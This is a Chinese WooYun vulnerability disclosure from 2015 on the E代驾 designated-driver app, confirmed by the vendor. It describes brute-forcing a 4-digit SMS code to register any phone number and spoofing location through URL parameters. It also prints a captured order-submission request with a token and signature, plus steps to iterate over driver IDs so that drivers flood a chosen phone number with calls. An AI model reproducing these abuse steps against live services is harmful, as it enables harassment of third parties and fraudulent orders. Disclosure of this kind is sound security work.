当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098563

漏洞标题:E代驾用户端几个问题打包(任意手机号注册/人肉群呼机/伪造定位/duang)

相关厂商:edaijia.cn

漏洞作者: 路人甲

提交时间:2015-02-27 14:29

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

E代驾用户端几个问题打包(任意手机号注册/人肉群呼机/伪造定位/duang)
E代驾是一个很好的创新企业,提交漏洞是为了督促你们做的更好!

详细说明:

漏洞证明:

1.任意手机号注册

http://h5.edaijia.cn/newapp/index.html?os=android&from=01050017&lng=113.456807&lat=23.095713


访问如上地址,点击我的账户,提示输入手机号码并获取验证码,验证码是4位数字,十分钟超时,so easy!

Q1.png


q2.PNG


2.伪造定位
还是

http://h5.edaijia.cn/newapp/index.html?os=android&from=01050017&lng=113.456807&lat=23.095713


修改lng 和 lat 的值实现GPS定位更改,从而伪造客户地址,或者用于获取司机信息
伪造为太原用户
http://h5.edaijia.cn/newapp/index.html?os=android&lat=37.86868318579&lng=112.48916877018&from=01050030
3.人肉群呼机
核心内容来了,以上都是铺垫,利用注册的手机号码18888888888下单,利用burpsuite拦截,修改driverid,遍历所有E代驾司机工号即可实现无限下单,duang.
发送的数据如下:

POST /order/commit HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://h5.edaijia.cn/newapp/index.html?os=android&from=01050017&lng=113.456807&lat=23.095713#
Accept-Language: zh-CN
Origin: http://h5.edaijia.cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: open.api.edaijia.cn
Content-Length: 238
DNT: 1
Pragma: no-cache
appkey=51000031&ver=3&from=01050017&timestamp=2015-02-27 13:37:23&driverId=GZ2858&token=7df68d813e0385a4762fd53e26891bbb&phone=18888888888&number=1&longitude=113.456807&latitude=23.095713&gpsType=baidu&sig=9da28792c0529d2c256826647260e78e


结果返回
2858

2858.png


58379

58379.png


and so on
例如你遍历了所有北京工号BJ0000-BJ99999
此时E代驾司机已经看见手机号码为18888888888用户的订单,赶紧拿起手中的电话呼起来吧。这个时候18888888888这个被伪造的用户哭了,被人肉电话DDOS了!
通过观察POST数据发现如果修改phone参数为其他号码最终会在系统内产生两个号码,一个叫用户号码一个叫做呼叫号码。

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-27 14:57

厂商回复:

谢谢,已在处理中。

最新状态:

暂无